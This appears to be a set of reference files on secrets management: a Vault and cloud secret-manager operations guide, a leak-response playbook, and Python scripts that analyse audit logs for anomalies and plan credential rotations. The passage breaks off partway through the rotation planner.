When operating multi-cloud, create a thin abstraction that normalizes secret access:
```python
# secret_client.py — cross-cloud abstraction
class SecretClient:
def __init__(self, provider, **kwargs):
if provider == "aws":
self._client = AWSSecretClient(**kwargs)
elif provider == "azure":
self._client = AzureSecretClient(**kwargs)
elif provider == "gcp":
self._client = GCPSecretClient(**kwargs)
elif provider == "vault":
self._client = VaultSecretClient(**kwargs)
else:
raise ValueError(f"Unknown provider: {provider}")
def get(self, key):
return self._client.get(key)
def set(self, key, value):
return self._client.set(key, value)
```
### Migration Strategy
When migrating between providers:
1. **Dual-write phase** — Write to both old and new store simultaneously
2. **Dual-read phase** — Read from new store, fallback to old
3. **Cut-over** — Read exclusively from new store
4. **Cleanup** — Remove secrets from old store after grace period
### Secret Synchronization
For hybrid setups (e.g., Vault as primary, cloud SM for specific workloads):
- Use Vault's cloud secret engines to generate cloud-native credentials dynamically
- Or use External Secrets Operator to sync from Vault into cloud-native stores
- Never manually copy secrets between stores — always automate
## Caching and Performance
### Client-Side Caching
All three cloud providers support caching SDKs:
- **AWS:** `aws-secretsmanager-caching-python` — caches with configurable TTL
- **Azure:** Built-in HTTP caching in SDK, or use Azure App Configuration
- **GCP:** No official caching library — implement in-process cache with TTL
### Caching Rules
1. Cache TTL should be shorter than rotation period (e.g., cache 5 min if rotating every 30 days)
2. Implement cache invalidation on secret version change events
3. Never cache secrets to disk — in-memory only
4. Log cache hits/misses for debugging rotation issues
## Compliance Mapping
| Requirement | AWS SM | Azure KV | GCP SM | Vault |
|------------|--------|----------|--------|-------|
| SOC 2 audit trail | CloudTrail | Monitor logs | Audit Logs | Audit device |
| HIPAA encryption | KMS (BAA) | HSM (BAA) | CMEK (BAA) | Auto-encrypt |
| PCI DSS key mgmt | KMS compliance | Premium HSM | CMEK | Transit engine |
| GDPR data residency | Region selection | Region selection | Region selection | Self-hosted |
| ISO 27001 | Certified | Certified | Certified | Self-certify |

View File

@@ -0,0 +1,280 @@
# Emergency Procedures Reference
## Secret Leak Response Playbook
### Severity Classification
| Severity | Definition | Response Time | Example |
|----------|-----------|---------------|---------|
| **P0 — Critical** | Production credentials exposed publicly | Immediate (15 min) | Database password in public GitHub repo |
| **P1 — High** | Internal credentials exposed beyond intended scope | 1 hour | API key in build logs accessible to wider org |
| **P2 — Medium** | Non-production credentials exposed | 4 hours | Staging DB password in internal wiki |
| **P3 — Low** | Expired or limited-scope credential exposed | 24 hours | Rotated API key found in old commit history |
### P0/P1 Response Procedure
**Phase 1: Contain (0-15 minutes)**
1. **Identify the leaked secret**
- What credential was exposed? (type, scope, permissions)
- Where was it exposed? (repo, log, error page, third-party service)
- When was it first exposed? (commit timestamp, log timestamp)
- Is the exposure still active? (repo public? log accessible?)
2. **Revoke immediately**
- Database password: `ALTER ROLE app_user WITH PASSWORD 'new_password';`
- API key: Regenerate via provider console/API
- Vault token: `vault token revoke <token>`
- AWS access key: `aws iam delete-access-key --access-key-id <key>`
- Cloud service account: Delete and recreate key
- TLS certificate: Revoke via CA, generate new certificate
3. **Remove exposure**
- Public repo: Remove file, force-push to remove from history, request GitHub cache purge
- Build logs: Delete log artifacts, rotate CI/CD secrets
- Error page: Deploy fix to suppress secret in error output
- Third-party: Contact vendor for log purge if applicable
4. **Deploy new credentials**
- Update secret store with rotated credential
- Restart affected services to pick up new credential
- Verify services are healthy with new credential
**Phase 2: Assess (15-60 minutes)**
5. **Audit blast radius**
- Query Vault/cloud SM audit logs for the compromised credential
- Check for unauthorized usage during the exposure window
- Review network logs for suspicious connections from unknown IPs
- Check if the compromised credential grants access to other secrets (privilege escalation)
6. **Notify stakeholders**
- Security team (always)
- Service owners for affected systems
- Compliance team if regulated data was potentially accessed
- Legal if customer data may have been compromised
- Executive leadership for P0 incidents
**Phase 3: Recover (1-24 hours)**
7. **Rotate adjacent credentials**
- If the leaked credential could access other secrets, rotate those too
- If a Vault token leaked, check what policies it had — rotate everything accessible
8. **Harden against recurrence**
- Add pre-commit hook to detect secrets (e.g., `gitleaks`, `detect-secrets`)
- Review CI/CD pipeline for secret masking
- Audit who has access to the source of the leak
**Phase 4: Post-Mortem (24-72 hours)**
9. **Document incident**
- Timeline of events
- Root cause analysis
- Impact assessment
- Remediation actions taken
- Preventive measures added
### Response Communication Template
```
SECURITY INCIDENT — SECRET EXPOSURE
Severity: P0/P1
Time detected: YYYY-MM-DD HH:MM UTC
Secret type: [database password / API key / token / certificate]
Exposure vector: [public repo / build log / error output / other]
Status: [CONTAINED / INVESTIGATING / RESOLVED]
Immediate actions taken:
- [ ] Credential revoked at source
- [ ] Exposure removed
- [ ] New credential deployed
- [ ] Services verified healthy
- [ ] Audit log review in progress
Blast radius assessment: [PENDING / COMPLETE — no unauthorized access / COMPLETE — unauthorized access detected]
Next update: [time]
Incident commander: [name]
```
## Vault Seal/Unseal Procedures
### Understanding Seal Status
Vault uses a **seal** mechanism to protect the encryption key hierarchy. When sealed, Vault cannot decrypt any data or serve any requests.
```
Sealed State:
Vault process running → YES
API responding → YES (503 Sealed)
Serving secrets → NO
All active leases → FROZEN (not revoked)
Audit logging → NO
Unsealed State:
Vault process running → YES
API responding → YES (200 OK)
Serving secrets → YES
Active leases → RESUMING
Audit logging → YES
```
### When to Seal Vault (Emergency Only)
Seal Vault when:
- Active intrusion on Vault infrastructure is confirmed
- Vault server compromise is suspected (unauthorized root access)
- Encryption key material may have been extracted
- Regulatory/legal hold requires immediate data access prevention
**Do NOT seal for:**
- Routine maintenance (use graceful shutdown instead)
- Single-node issues in HA cluster (let standby take over)
- Suspected secret leak (revoke the secret, don't seal Vault)
### Seal Procedure
```bash
# Seal a single node
vault operator seal
# Seal all nodes (HA cluster)
# Seal each node individually — leader last
vault operator seal -address=https://vault-standby-1:8200
vault operator seal -address=https://vault-standby-2:8200
vault operator seal -address=https://vault-leader:8200
```
**Impact of sealing:**
- All active client connections dropped immediately
- All token and lease timers paused
- Applications lose secret access — prepare for cascading failures
- Monitoring will fire alerts for sealed state
### Unseal Procedure (Shamir Keys)
Requires a quorum of key holders (e.g., 3 of 5).
```bash
# Each key holder provides their unseal key
vault operator unseal <key-1>
vault operator unseal <key-2>
vault operator unseal <key-3>
# Vault unseals after reaching threshold
```
**Operational checklist after unseal:**
1. Verify health: `vault status` shows `Sealed: false`
2. Check audit devices: `vault audit list` — confirm all enabled
3. Check auth methods: `vault auth list`
4. Verify HA status: `vault operator raft list-peers`
5. Check lease count: monitor `vault.expire.num_leases`
6. Verify applications reconnecting (check application logs)
### Unseal Procedure (Auto-Unseal)
If using cloud KMS auto-unseal, Vault unseals automatically on restart:
```bash
# Restart Vault service
systemctl restart vault
# Verify unseal (should happen within seconds)
vault status
```
**If auto-unseal fails:**
- Check cloud KMS key permissions (IAM role may have been modified)
- Check network connectivity to cloud KMS endpoint
- Check KMS key status (not disabled, not scheduled for deletion)
- Check Vault logs: `journalctl -u vault -f`
## Mass Credential Rotation Procedure
When a broad compromise requires rotating many credentials simultaneously.
### Pre-Rotation Checklist
- [ ] Identify all credentials in scope
- [ ] Map credential dependencies (which services use which credentials)
- [ ] Determine rotation order (databases before applications)
- [ ] Prepare rollback plan for each credential
- [ ] Notify all service owners
- [ ] Schedule maintenance window if zero-downtime not possible
- [ ] Stage new credentials in secret store (but don't activate yet)
### Rotation Order
1. **Infrastructure credentials** — Database root passwords, cloud IAM admin keys
2. **Service credentials** — Application database users, API keys
3. **Integration credentials** — Third-party API keys, webhook secrets
4. **Human credentials** — Force password reset, revoke SSO sessions
### Rollback Plan
For each credential, document:
- Previous value (store in sealed emergency envelope or HSM)
- How to revert (specific command or API call)
- Verification step (how to confirm old credential works)
- Maximum time to rollback (SLA)
## Vault Recovery Procedures
### Lost Unseal Keys
If unseal keys are lost and auto-unseal is not configured:
1. **If Vault is currently unsealed:** Enable auto-unseal immediately, then reseal/unseal with KMS
2. **If Vault is sealed:** Data is irrecoverable without keys. Restore from Raft snapshot backup
3. **Prevention:** Store unseal keys in separate, secure locations (HSMs, safety deposit boxes). Use auto-unseal for production.
### Raft Cluster Recovery
**Single node failure (cluster still has quorum):**
```bash
# Remove failed peer
vault operator raft remove-peer <failed-node-id>
# Add replacement node
# (new node joins via retry_join in config)
```
**Loss of quorum (majority of nodes failed):**
```bash
# On a surviving node with recent data
vault operator raft join -leader-ca-cert=@ca.crt https://surviving-node:8200
# If no node survives, restore from snapshot
vault operator raft snapshot restore /backups/latest.snap
```
### Root Token Recovery
If root token is lost (it should be revoked after initial setup):
```bash
# Generate new root token (requires unseal key quorum)
vault operator generate-root -init
# Each key holder provides their key
vault operator generate-root -nonce=<nonce> <unseal-key>
# After quorum, decode the encoded token
vault operator generate-root -decode=<encoded-token> -otp=<otp>
```
**Best practice:** Generate a root token only when needed, complete the task, then revoke it:
```bash
vault token revoke <root-token>
```
## Incident Severity Escalation Matrix
| Signal | Escalation |
|--------|-----------|
| Single secret exposed in internal log | P2 — Rotate secret, add log masking |
| Secret in public repository (no evidence of use) | P1 — Immediate rotation, history scrub |
| Secret in public repository (evidence of unauthorized use) | P0 — Full incident response, legal notification |
| Vault node compromised | P0 — Seal cluster, rotate all accessible secrets |
| Cloud KMS key compromised | P0 — Create new key, re-encrypt all secrets, rotate all credentials |
| Audit log gap detected | P1 — Investigate cause, assume worst case for gap period |
| Multiple failed auth attempts from unknown source | P2 — Block source, investigate, rotate targeted credentials |

View File

@@ -0,0 +1,342 @@
# HashiCorp Vault Architecture & Patterns Reference
## Architecture Overview
Vault operates as a centralized secret management service with a client-server model. All secrets are encrypted at rest and in transit. The seal/unseal mechanism protects the master encryption key.
### Core Components
```
┌─────────────────────────────────────────────────┐
│ Vault Cluster │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ │
│ │ Leader │ │ Standby │ │ Standby │ │
│ │ (active) │ │ (forward) │ │ (forward) │ │
│ └─────┬─────┘ └─────┬─────┘ └─────┬─────┘ │
│ │ │ │ │
│ ┌─────┴───────────────┴───────────────┴─────┐ │
│ │ Raft Storage Backend │ │
│ └───────────────────────────────────────────┘ │
│ │
│ ┌──────────┐ ┌──────────┐ ┌──────────────┐ │
│ │ Auth │ │ Secret │ │ Audit │ │
│ │ Methods │ │ Engines │ │ Devices │ │
│ └──────────┘ └──────────┘ └──────────────┘ │
└─────────────────────────────────────────────────┘
```
### Storage Backend Selection
| Backend | HA Support | Operational Complexity | Recommendation |
|---------|-----------|----------------------|----------------|
| Integrated Raft | Yes | Low | **Default choice** — no external dependencies |
| Consul | Yes | Medium | Legacy — use Raft unless already running Consul |
| S3/GCS/Azure Blob | No | Low | Dev/test only — no HA |
| PostgreSQL/MySQL | No | Medium | Not recommended — no HA, added dependency |
## High Availability Setup
### Raft Cluster Configuration
Minimum 3 nodes for production (tolerates 1 failure). 5 nodes for critical workloads (tolerates 2 failures).
```hcl
# vault-config.hcl (per node)
storage "raft" {
path = "/opt/vault/data"
node_id = "vault-1"
retry_join {
leader_api_addr = "https://vault-2.internal:8200"
}
retry_join {
leader_api_addr = "https://vault-3.internal:8200"
}
}
listener "tcp" {
address = "0.0.0.0:8200"
tls_cert_file = "/opt/vault/tls/vault.crt"
tls_key_file = "/opt/vault/tls/vault.key"
}
api_addr = "https://vault-1.internal:8200"
cluster_addr = "https://vault-1.internal:8201"
```
### Auto-Unseal with AWS KMS
Eliminates manual unseal key management. Vault encrypts its master key with the KMS key.
```hcl
seal "awskms" {
region = "us-east-1"
kms_key_id = "alias/vault-unseal"
}
```
**Requirements:**
- IAM role with `kms:Encrypt`, `kms:Decrypt`, `kms:DescribeKey` permissions
- KMS key must be in the same region or accessible cross-region
- KMS key should have restricted access — only Vault nodes
### Auto-Unseal with Azure Key Vault
```hcl
seal "azurekeyvault" {
tenant_id = "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
vault_name = "vault-unseal-kv"
key_name = "vault-unseal-key"
}
```
### Auto-Unseal with GCP KMS
```hcl
seal "gcpckms" {
project = "my-project"
region = "global"
key_ring = "vault-keyring"
crypto_key = "vault-unseal-key"
}
```
## Namespaces (Enterprise)
Namespaces provide tenant isolation within a single Vault cluster. Each namespace has independent policies, auth methods, and secret engines.
```
root/
├── dev/ # Development environment
│ ├── auth/
│ └── secret/
├── staging/ # Staging environment
│ ├── auth/
│ └── secret/
└── production/ # Production environment
├── auth/
└── secret/
```
**OSS alternative:** Use path-based isolation with strict policies. Prefix all paths with environment name (e.g., `secret/data/production/...`).
## Policy Patterns
### Templated Policies
Use identity-based templates for scalable policy management:
```hcl
# Allow entities to manage their own secrets
path "secret/data/{{identity.entity.name}}/*" {
capabilities = ["create", "read", "update", "delete"]
}
# Read shared config for the entity's group
path "secret/data/shared/{{identity.groups.names}}/*" {
capabilities = ["read"]
}
```
### Sentinel Policies (Enterprise)
Enforce governance rules beyond path-based access:
```python
# Require MFA for production secret writes
import "mfa"
main = rule {
request.path matches "secret/data/production/.*" and
request.operation in ["create", "update", "delete"] and
mfa.methods.totp.valid
}
```
### Policy Hierarchy
1. **Global deny** — Explicit deny on `sys/*`, `auth/token/create-orphan`
2. **Environment base** — Read access to environment-specific paths
3. **Service-specific** — Scoped to exact paths the service needs
4. **Admin override** — Requires MFA, time-limited, audit-heavy
## Secret Engine Configuration
### KV v2 (Versioned Key-Value)
```bash
# Enable with custom config
vault secrets enable -path=secret -version=2 kv
# Configure version retention
vault write secret/config max_versions=10 cas_required=true delete_version_after=90d
```
**Check-and-Set (CAS):** Prevents accidental overwrites. Client must supply the current version number to update.
### Database Engine
```bash
# Enable and configure PostgreSQL
vault secrets enable database
vault write database/config/postgres \
plugin_name=postgresql-database-plugin \
connection_url="postgresql://{{username}}:{{password}}@db.internal:5432/app?sslmode=require" \
allowed_roles="app-readonly,app-readwrite" \
username="vault_admin" \
password="INITIAL_PASSWORD"
# Rotate the root password (Vault manages it from now on)
vault write -f database/rotate-root/postgres
# Create a read-only role
vault write database/roles/app-readonly \
db_name=postgres \
creation_statements="CREATE ROLE \"{{name}}\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; GRANT SELECT ON ALL TABLES IN SCHEMA public TO \"{{name}}\";" \
revocation_statements="DROP ROLE IF EXISTS \"{{name}}\";" \
default_ttl=1h \
max_ttl=24h
```
### PKI Engine (Certificate Authority)
```bash
# Enable PKI engine
vault secrets enable -path=pki pki
vault secrets tune -max-lease-ttl=87600h pki
# Generate root CA
vault write -field=certificate pki/root/generate/internal \
common_name="Example Root CA" \
ttl=87600h > root_ca.crt
# Enable intermediate CA
vault secrets enable -path=pki_int pki
vault secrets tune -max-lease-ttl=43800h pki_int
# Generate intermediate CSR
vault write -field=csr pki_int/intermediate/generate/internal \
common_name="Example Intermediate CA" > intermediate.csr
# Sign with root CA
vault write -field=certificate pki/root/sign-intermediate \
csr=@intermediate.csr format=pem_bundle ttl=43800h > intermediate.crt
# Set signed certificate
vault write pki_int/intermediate/set-signed certificate=@intermediate.crt
# Create role for leaf certificates
vault write pki_int/roles/web-server \
allowed_domains="example.com" \
allow_subdomains=true \
max_ttl=2160h
```
### Transit Engine (Encryption-as-a-Service)
```bash
vault secrets enable transit
# Create encryption key
vault write -f transit/keys/payment-data \
type=aes256-gcm96
# Encrypt data
vault write transit/encrypt/payment-data \
plaintext=$(echo "sensitive-data" | base64)
# Decrypt data
vault write transit/decrypt/payment-data \
ciphertext="vault:v1:..."
# Rotate key (old versions still decrypt, new encrypts with latest)
vault write -f transit/keys/payment-data/rotate
# Rewrap ciphertext to latest key version
vault write transit/rewrap/payment-data \
ciphertext="vault:v1:..."
```
## Performance and Scaling
### Performance Replication (Enterprise)
Primary cluster replicates to secondary clusters in other regions. Secondaries handle read traffic locally.
### Performance Standbys (Enterprise)
Standby nodes serve read requests without forwarding to the leader, reducing leader load.
### Response Wrapping
Wrap sensitive responses in a single-use token — the recipient unwraps exactly once:
```bash
# Wrap a secret (TTL = 5 minutes)
vault kv get -wrap-ttl=5m secret/data/production/db-creds
# Recipient unwraps
vault unwrap <wrapping_token>
```
### Batch Tokens
For high-throughput workloads (Lambda, serverless), use batch tokens instead of service tokens. Batch tokens are not persisted to storage, reducing I/O.
## Monitoring and Health
### Key Metrics
| Metric | Alert Threshold | Source |
|--------|----------------|--------|
| `vault.core.unsealed` | 0 (sealed) | Telemetry |
| `vault.expire.num_leases` | >10,000 | Telemetry |
| `vault.audit.log_response` | Error rate >1% | Telemetry |
| `vault.runtime.alloc_bytes` | >80% memory | Telemetry |
| `vault.raft.leader.lastContact` | >500ms | Telemetry |
| `vault.token.count` | >50,000 | Telemetry |
### Health Check Endpoint
```bash
# Returns 200 if initialized, unsealed, and active
curl -s https://vault.internal:8200/v1/sys/health
# Status codes:
# 200 — initialized, unsealed, active
# 429 — unsealed, standby
# 472 — disaster recovery secondary
# 473 — performance standby
# 501 — not initialized
# 503 — sealed
```
## Disaster Recovery
### Backup
```bash
# Raft snapshot (includes all data)
vault operator raft snapshot save backup-$(date +%Y%m%d).snap
# Schedule daily backups via cron
0 2 * * * /usr/local/bin/vault operator raft snapshot save /backups/vault-$(date +\%Y\%m\%d).snap
```
### Restore
```bash
# Restore from snapshot (causes brief outage)
vault operator raft snapshot restore backup-20260320.snap
```
### DR Replication (Enterprise)
Secondary cluster in standby. Promote on primary failure:
```bash
# On DR secondary
vault operator generate-root -dr-token
vault write sys/replication/dr/secondary/promote dr_operation_token=<token>
```

View File

@@ -0,0 +1,330 @@
#!/usr/bin/env python3
"""Analyze Vault or cloud secret manager audit logs for anomalies.
Reads JSON-lines or JSON-array audit log files and flags unusual access
patterns including volume spikes, off-hours access, new source IPs,
and failed authentication attempts.
Usage:
python audit_log_analyzer.py --log-file vault-audit.log --threshold 5
python audit_log_analyzer.py --log-file audit.json --threshold 3 --json
Expected log entry format (JSON lines or JSON array):
{
"timestamp": "2026-03-20T14:32:00Z",
"type": "request",
"auth": {"accessor": "token-abc123", "entity_id": "eid-001", "display_name": "approle-payment-svc"},
"request": {"path": "secret/data/production/payment/api-keys", "operation": "read"},
"response": {"status_code": 200},
"remote_address": "10.0.1.15"
}
Fields are optional — the analyzer works with whatever is available.
"""
import argparse
import json
import sys
import textwrap
from collections import defaultdict
from datetime import datetime
def load_logs(path):
"""Load audit log entries from file. Supports JSON lines and JSON array."""
entries = []
try:
with open(path, "r") as f:
content = f.read().strip()
except FileNotFoundError:
print(f"ERROR: Log file not found: {path}", file=sys.stderr)
sys.exit(1)
if not content:
return entries
# Try JSON array first
if content.startswith("["):
try:
entries = json.loads(content)
return entries
except json.JSONDecodeError:
pass
# Try JSON lines
for i, line in enumerate(content.split("\n"), 1):
line = line.strip()
if not line:
continue
try:
entries.append(json.loads(line))
except json.JSONDecodeError:
print(f"WARNING: Skipping malformed line {i}", file=sys.stderr)
return entries
def extract_fields(entry):
"""Extract normalized fields from a log entry."""
timestamp_raw = entry.get("timestamp", entry.get("time", ""))
ts = None
if timestamp_raw:
for fmt in ("%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%dT%H:%M:%S.%fZ", "%Y-%m-%dT%H:%M:%S%z", "%Y-%m-%d %H:%M:%S"):
try:
ts = datetime.strptime(timestamp_raw.replace("+00:00", "Z").rstrip("Z") + "Z", fmt.rstrip("Z") + "Z") if "Z" not in fmt else datetime.strptime(timestamp_raw, fmt)
break
except (ValueError, TypeError):
continue
if ts is None:
# Fallback: try basic parse
try:
ts = datetime.fromisoformat(timestamp_raw.replace("Z", "+00:00").replace("+00:00", ""))
except (ValueError, TypeError):
pass
auth = entry.get("auth", {})
request = entry.get("request", {})
response = entry.get("response", {})
return {
"timestamp": ts,
"hour": ts.hour if ts else None,
"identity": auth.get("display_name", auth.get("entity_id", "unknown")),
"path": request.get("path", entry.get("path", "unknown")),
"operation": request.get("operation", entry.get("operation", "unknown")),
"status_code": response.get("status_code", entry.get("status_code")),
"remote_address": entry.get("remote_address", entry.get("source_address", "unknown")),
"entry_type": entry.get("type", "unknown"),
}
def analyze(entries, threshold):
"""Run anomaly detection across all log entries."""
parsed = [extract_fields(e) for e in entries]
# Counters
access_by_identity = defaultdict(int)
access_by_path = defaultdict(int)
access_by_ip = defaultdict(set) # identity -> set of IPs
ip_to_identities = defaultdict(set) # IP -> set of identities
failed_by_source = defaultdict(int)
off_hours_access = []
path_by_identity = defaultdict(set) # identity -> set of paths
hourly_distribution = defaultdict(int)
for p in parsed:
identity = p["identity"]
path = p["path"]
ip = p["remote_address"]
status = p["status_code"]
hour = p["hour"]
access_by_identity[identity] += 1
access_by_path[path] += 1
access_by_ip[identity].add(ip)
ip_to_identities[ip].add(identity)
path_by_identity[identity].add(path)
if hour is not None:
hourly_distribution[hour] += 1
# Failed access (non-200 or 4xx/5xx)
if status and (status >= 400 or status == 0):
failed_by_source[f"{identity}@{ip}"] += 1
# Off-hours: before 6 AM or after 10 PM
if hour is not None and (hour < 6 or hour >= 22):
off_hours_access.append(p)
# Build anomalies
anomalies = []
# 1. Volume spikes — identities accessing secrets more than threshold * average
if access_by_identity:
avg_access = sum(access_by_identity.values()) / len(access_by_identity)
spike_threshold = max(threshold * avg_access, threshold)
for identity, count in access_by_identity.items():
if count >= spike_threshold:
anomalies.append({
"type": "volume_spike",
"severity": "HIGH",
"identity": identity,
"access_count": count,
"threshold": round(spike_threshold, 1),
"description": f"Identity '{identity}' made {count} accesses (threshold: {round(spike_threshold, 1)})",
})
# 2. Multi-IP access — single identity from many IPs
for identity, ips in access_by_ip.items():
if len(ips) >= threshold:
anomalies.append({
"type": "multi_ip_access",
"severity": "MEDIUM",
"identity": identity,
"ip_count": len(ips),
"ips": sorted(ips),
"description": f"Identity '{identity}' accessed from {len(ips)} different IPs",
})
# 3. Failed access attempts
for source, count in failed_by_source.items():
if count >= threshold:
anomalies.append({
"type": "failed_access",
"severity": "HIGH",
"source": source,
"failure_count": count,
"description": f"Source '{source}' had {count} failed access attempts",
})
# 4. Off-hours access
if off_hours_access:
off_hours_identities = defaultdict(int)
for p in off_hours_access:
off_hours_identities[p["identity"]] += 1
for identity, count in off_hours_identities.items():
if count >= max(threshold, 2):
anomalies.append({
"type": "off_hours_access",
"severity": "MEDIUM",
"identity": identity,
"access_count": count,
"description": f"Identity '{identity}' made {count} accesses outside business hours (before 6 AM / after 10 PM)",
})
# 5. Broad path access — single identity touching many paths
for identity, paths in path_by_identity.items():
if len(paths) >= threshold * 2:
anomalies.append({
"type": "broad_access",
"severity": "MEDIUM",
"identity": identity,
"path_count": len(paths),
"paths": sorted(paths)[:10],
"description": f"Identity '{identity}' accessed {len(paths)} distinct secret paths",
})
# Sort anomalies by severity
severity_order = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3}
anomalies.sort(key=lambda x: severity_order.get(x["severity"], 4))
# Summary stats
summary = {
"total_entries": len(entries),
"parsed_entries": len(parsed),
"unique_identities": len(access_by_identity),
"unique_paths": len(access_by_path),
"unique_source_ips": len(ip_to_identities),
"total_failures": sum(failed_by_source.values()),
"off_hours_events": len(off_hours_access),
"anomalies_found": len(anomalies),
}
# Top accessed paths
top_paths = sorted(access_by_path.items(), key=lambda x: -x[1])[:10]
return {
"summary": summary,
"anomalies": anomalies,
"top_accessed_paths": [{"path": p, "count": c} for p, c in top_paths],
"hourly_distribution": dict(sorted(hourly_distribution.items())),
}
def print_human(result, threshold):
"""Print human-readable analysis report."""
summary = result["summary"]
anomalies = result["anomalies"]
print("=== Audit Log Analysis Report ===")
print(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M')}")
print(f"Anomaly threshold: {threshold}")
print()
print("--- Summary ---")
print(f" Total log entries: {summary['total_entries']}")
print(f" Unique identities: {summary['unique_identities']}")
print(f" Unique secret paths: {summary['unique_paths']}")
print(f" Unique source IPs: {summary['unique_source_ips']}")
print(f" Total failures: {summary['total_failures']}")
print(f" Off-hours events: {summary['off_hours_events']}")
print(f" Anomalies detected: {summary['anomalies_found']}")
print()
if anomalies:
print("--- Anomalies ---")
for i, a in enumerate(anomalies, 1):
print(f" [{a['severity']}] {a['type']}: {a['description']}")
print()
else:
print("--- No anomalies detected ---")
print()
if result["top_accessed_paths"]:
print("--- Top Accessed Paths ---")
for item in result["top_accessed_paths"]:
print(f" {item['count']:5d} {item['path']}")
print()
if result["hourly_distribution"]:
print("--- Hourly Distribution ---")
max_count = max(result["hourly_distribution"].values()) if result["hourly_distribution"] else 1
for hour in range(24):
count = result["hourly_distribution"].get(hour, 0)
bar_len = int((count / max_count) * 40) if max_count > 0 else 0
marker = " *" if (hour < 6 or hour >= 22) else ""
print(f" {hour:02d}:00 {'#' * bar_len:40s} {count}{marker}")
print(" (* = off-hours)")
def main():
parser = argparse.ArgumentParser(
description="Analyze Vault/cloud secret manager audit logs for anomalies.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent("""\
The analyzer detects:
- Volume spikes (identity accessing secrets above threshold * average)
- Multi-IP access (single identity from many source IPs)
- Failed access attempts (repeated auth/access failures)
- Off-hours access (before 6 AM or after 10 PM)
- Broad path access (single identity accessing many distinct paths)
Log format: JSON lines or JSON array. Each entry should include
timestamp, auth info, request path/operation, response status,
and remote address. Missing fields are handled gracefully.
Examples:
%(prog)s --log-file vault-audit.log --threshold 5
%(prog)s --log-file audit.json --threshold 3 --json
"""),
)
parser.add_argument("--log-file", required=True, help="Path to audit log file (JSON lines or JSON array)")
parser.add_argument(
"--threshold",
type=int,
default=5,
help="Anomaly sensitivity threshold — lower = more sensitive (default: 5)",
)
parser.add_argument("--json", action="store_true", dest="json_output", help="Output as JSON")
args = parser.parse_args()
entries = load_logs(args.log_file)
if not entries:
print("No log entries found in file.", file=sys.stderr)
sys.exit(1)
result = analyze(entries, args.threshold)
result["log_file"] = args.log_file
result["threshold"] = args.threshold
result["analyzed_at"] = datetime.now().isoformat()
if args.json_output:
print(json.dumps(result, indent=2))
else:
print_human(result, args.threshold)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,280 @@
#!/usr/bin/env python3
"""Create a rotation schedule from a secret inventory file.
Reads a JSON inventory of secrets and produces a rotation plan based on
the selected policy (30d, 60d, 90d) with urgency classification.
Usage:
python rotation_planner.py --inventory secrets.json --policy 30d
python rotation_planner.py --inventory secrets.json --policy 90d --json
Inventory file format (JSON):
[
{
"name": "prod-db-password",
"type": "database",
"store": "vault",
"last_rotated": "2026-01-15",
"owner": "platform-team",
"environment": "production"
},
...
]
"""
import argparse
import json
import sys
import textwrap
from datetime import datetime, timedelta
POLICY_DAYS = {
"30d": 30,
"60d": 60,
"90d": 90,
}
# Default rotation period by secret type if not overridden by policy
TYPE_DEFAULTS = {
"database": 30,
"api-key": 90,
"tls-certificate": 60,
"ssh-key": 90,
"service-token": 1,
"encryption-key": 90,
"oauth-secret": 90,
"password": 30,
}
URGENCY_THRESHOLDS = {
"critical": 0, # Already overdue
"high": 7, # Due within 7 days
"medium": 14, # Due within 14 days
"low": 30, # Due within 30 days
}
def load_inventory(path):
"""Load and validate secret inventory from JSON file."""
try:
with open(path, "r") as f:
data = json.load(f)
except FileNotFoundError:
print(f"ERROR: Inventory file not found: {path}", file=sys.stderr)
sys.exit(1)
except json.JSONDecodeError as e:
print(f"ERROR: Invalid JSON in {path}: {e}", file=sys.stderr)
sys.exit(1)
if not isinstance(data, list):
print("ERROR: Inventory must be a JSON array of secret objects", file=sys.stderr)
sys.exit(1)
validated = []
for i, entry in enumerate(data):
if not isinstance(entry, dict):
print(f"WARNING: Skipping entry {i} — not an object", file=sys.stderr)
continue
name = entry.get("name", f"unnamed-{i}")
secret_type = entry.get("type", "unknown")
last_rotated = entry.get("last_rotated")
if not last_rotated:
print(f"WARNING: '{name}' has no last_rotated date — marking as overdue", file=sys.stderr)
last_rotated_dt = None
else:
try:
last_rotated_dt = datetime.strptime(last_rotated, "%Y-%m-%d")
except ValueError:
print(f"WARNING: '{name}' has invalid date '{last_rotated}' — marking as overdue", file=sys.stderr)
last_rotated_dt = None
validated.append({
"name": name,
"type": secret_type,
"store": entry.get("store", "unknown"),
"last_rotated": last_rotated_dt,
"owner": entry.get("owner", "unassigned"),
"environment": entry.get("environment", "unknown"),
})
return validated
def compute_schedule(inventory, policy_days):
"""Compute rotation schedule for each secret."""
now = datetime.now()
schedule = []
for secret in inventory:
# Determine rotation interval
type_default = TYPE_DEFAULTS.get(secret["type"], 90)
rotation_interval = min(policy_days, type_default)
if secret["last_rotated"] is None:
days_since = 999
next_rotation = now # Immediate
days_until = -999
else:
days_since = (now - secret["last_rotated"]).days
next_rotation = secret["last_rotated"] + timedelta(days=rotation_interval)
days_until = (next_rotation - now).days
# Classify urgency
if days_until <= URGENCY_THRESHOLDS["critical"]:
urgency = "CRITICAL"
elif days_until <= URGENCY_THRESHOLDS["high"]:
urgency = "HIGH"
elif days_until <= URGENCY_THRESHOLDS["medium"]:
urgency = "MEDIUM"
else:
urgency = "LOW"
schedule.append({
"name": secret["name"],
"type": secret["type"],
"store": secret["store"],
"owner": secret["owner"],
"environment": secret["environment"],
"last_rotated": secret["last_rotated"].strftime("%Y-%m-%d") if secret["last_rotated"] else "NEVER",
"rotation_interval_days": rotation_interval,
"next_rotation": next_rotation.strftime("%Y-%m-%d"),
"days_until_due": days_until,
"days_since_rotation": days_since,
"urgency": urgency,
})
# Sort by urgency (critical first), then by days until due
urgency_order = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3}
schedule.sort(key=lambda x: (urgency_order.get(x["urgency"], 4), x["days_until_due"]))
return schedule
def build_summary(schedule):
"""Build summary statistics."""
total = len(schedule)
by_urgency = {}
by_type = {}
by_owner = {}
for entry in schedule:
urg = entry["urgency"]
by_urgency[urg] = by_urgency.get(urg, 0) + 1
t = entry["type"]
by_type[t] = by_type.get(t, 0) + 1
